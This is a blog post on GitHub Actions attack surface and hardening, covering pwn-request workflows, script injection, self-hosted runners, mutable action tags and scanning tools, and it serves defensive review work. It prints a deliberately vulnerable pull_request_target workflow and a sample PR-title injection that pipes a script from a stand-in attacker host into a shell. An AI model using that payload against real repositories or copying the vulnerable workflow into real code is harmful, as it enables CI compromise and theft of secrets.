GitHub Actions as an Attacker's Playground — 2026 Edition
CI/CD security • Supply chain • April 2026
ci-cdgithub-actionssupply-chainpwn-requestred-team
If your threat model still has "the dev laptop" as the most privileged workstation in the company, you have not been paying attention. The GitHub Actions runner is. It has production cloud credentials, registry push tokens, signing keys, and the authority to merge its own code. It is the new privileged perimeter, and by every measure we have, it is softer than the one it replaced.
This is the 2026 version of the GitHub Actions attack surface. What changed, what did not, and what you should be looking for in any code review that touches .github/workflows/.
The Classic: Pwn Request
The pattern has not changed in five years. pull_request_target runs with the target repo's secrets and write permissions. If the workflow explicitly checks out the PR head and executes anything from it, the PR author gets code execution in a context with those secrets and that write access.
name: Dangerous PR runner
on: pull_request_target:
jobs:
run-pr-code:
runs-on: ubuntu-latest
permissions:
contents: write
pull-requests: write
steps:
- uses: actions/checkout@v4
with:
ref: ${{ github.event.pull_request.head.sha }} # the footgun
- name: Run script
run: scripts/run.sh # attacker controls this fileThe attacker PR modifies scripts/run.sh, the workflow checks out the PR head, runs the attacker's script, and the script exfiltrates $GITHUB_TOKEN. Every flavour of this bug is the same. The script can be an npm preinstall hook, a modified package.json, a new test file, a conftest.py Python side-effect. "Don't build untrusted PRs" has been the guidance since 2020 and we still find it everywhere.
Microsoft/symphony (CVE-2025-61671, CVSS 9.3) was this exact pattern. A reusable Terraform validation workflow checked out the PR merge ref with contents: write. Researchers pushed a new branch to Microsoft's origin and compromised an Azure service principal in Microsoft's tenant. Microsoft's security team initially classified it as working-as-intended.
Script Injection in run: Steps
Every ${{ github.event.* }} interpolation that ends up in a shell run: block is a potential injection. The classic:
- name: Greet PR
run: echo "Thanks for the PR: ${{ github.event.pull_request.title }}"PR title: "; curl attacker.tld/s.sh | sh; echo ". The runner executes the shell, substitutes the title verbatim, and the command runs. Issue titles, PR bodies, commit messages, branch names, review comments, labels — all attacker-controlled, all reachable via github.event.
The fix is always the same: pass through env:, never inline:
- name: Greet PR
env:
PR_TITLE: ${{ github.event.pull_request.title }}
run: echo "Thanks for the PR: $PR_TITLE"And yet the original pattern is the second most common bug class that Sysdig, Wiz, Orca, and GitHub Security Lab have been publishing on for the last two years.
Self-Hosted Runners
A self-hosted runner attached to a public repo is free compute for whoever submits the right PR. Unless the runner is configured to require approval for external contributors, an attacker PR runs on infrastructure inside your network.
The Nvidia case from 2025 is the template. Researchers dropped a systemd service that polled git config --list every half second and logged the output. On the second workflow run, the service exposed the GITHUB_TOKEN. Even though the token lacked packages: write, the runner itself was an EC2 instance with IAM permissions and network access to internal services.
Self-hosted runner hardening checklist, paraphrased from five different incident reports:
- Ephemeral runners only. One job, one runner, destroyed after. Docker or
actions-runner-controlleron Kubernetes. - Never attach self-hosted runners to public repos. Ever.
- Runner service account has no cloud IAM roles beyond what the job needs.
- Network egress allow-list. No arbitrary outbound to the internet.
- Runner host is not in the same VPC as production. Treat it like DMZ.
Supply Chain: Mutable Tags and Force-Pushed Actions
Actions are resolved at runtime. uses: org/action@v3 resolves to whatever commit v3 currently points at. When that tag gets force-pushed to a malicious commit, every workflow that uses the action runs the attacker's code on the next invocation.
tj-actions/changed-files (March 2025). A single compromised PAT led to poisoned actions that leaked secrets from over 23,000 workflows via workflow logs.
TeamPCP / trivy-action (March 2026). Attackers compromised 75 of 76 trivy-action version tags via force-push, exfiltrating secrets from every pipeline running a Trivy scan. The stolen credentials cascaded into PyPI compromises including LiteLLM.
The only defense is SHA pinning:
# Don't:
uses: aquasecurity/trivy-action@master
uses: aquasecurity/trivy-action@v0.24.0
# Do:
uses: aquasecurity/trivy-action@18f2510ee396bbf400402947b394f2dd8c87dbb0 # v0.24.0Dependabot can update pinned SHAs. Since August 2025 GitHub's "Allowed actions" policy supports SHA pinning enforcement that fails unpinned workflows, not just warns. Turn it on.
The December 2025 Changes — What Actually Got Fixed
GitHub shipped protections on 8 December 2025. The short version:
pull_request_targetworkflow definitions are now always sourced from the default branch. You can no longer exploit an outdated vulnerable workflow that still lives on a non-default branch.- Environment policy evaluation now aligns with the workflow code actually executing.
- Centralized ruleset framework for workflow execution protections — event rules, SHA pinning, action allow/block lists by
!prefix, workflow_dispatch trigger restrictions.
What did not get fixed: the base pwn request pattern. If your workflow uses pull_request_target and checks out PR code to run it, the attacker still gets code execution with your secrets. As Astral noted, these triggers are almost impossible to use securely. GitHub is adding guardrails, not removing the footgun.
The 2026 Threat Landscape
Orca's HackerBot-Claw campaign (Sep 2025) was the first major automated scanning campaign that I remember seeing at scale. It systematically triggered PR workflows against public repos, looking for exploitable CI configurations. Named targets included Microsoft, DataDog, CNCF Akri, Trivy itself, and RustPython. The campaign's impact was not that it found new bug classes — it exploited the same pwn-request and script-injection patterns from five years ago. The impact was that automated scanning of CI configurations is now a thing, and the economics favour the attacker: one vulnerable repo of the Fortune 500 is worth a lot of compute time.
If you maintain a public repo with a CI pipeline, assume you are being scanned continuously by at least one such campaign right now.
What a Review Actually Looks Like
The toolchain has matured. These are the ones I reach for on engagements:
- zizmor. Static analysis for GitHub Actions. Catches most of the common misconfigurations (
pull_request_targetwith checkout, script injection, excessive permissions, unpinned actions). Run this first. - Gato-X. Enumeration and attack tooling. If you are testing your own org's exposure, this is the red-team side.
- CodeQL for GitHub Actions. The first-party analysis, free for public repos. Good coverage for the GitHub-specific query pack.
- Octoscan. Another static scanner; different ruleset than zizmor, catches things zizmor misses and vice versa.
The workflow-level hardening that moves the needle:
# At the top of every workflow
permissions: {} # start from zero, grant per-job
# Per job
jobs:
build:
permissions:
contents: read
# never use pull_request_target unless you truly need secrets
# and you do NOT check out PR codeOrganization-wide: require SHA-pinned actions, restrict workflow_dispatch to maintainers, disable pull_request_target on repos that do not need it, enable CodeQL for Actions, rotate repo-scoped PATs on a schedule. These are dashboard toggles. They cost you nothing and they kill 80% of what the automated scanners exploit.
GITHUB_TOKEN. If you inherited an older org, this is your first audit. One toggle, huge blast-radius reduction.Closing
The suits keep asking why an industry that has been publishing on GitHub Actions security for five years still ships this stuff. The honest answer is that CI/CD is owned by the engineers who are also shipping the product, and "security hardening of the pipeline" sits below every feature deadline on the priority stack. GitHub is now forcing some of the hardening through platform defaults because the community never did it voluntarily.
If you are on the offensive side, CI is still the cheapest path to production secrets in most engagements. If you are on the defensive side, your CI pipeline needs the same threat model you give your production service. Same allow-lists, same least privilege, same rotation, same monitoring. It already has the same blast radius.
elusive thoughts • securityhorror.blogspot.com
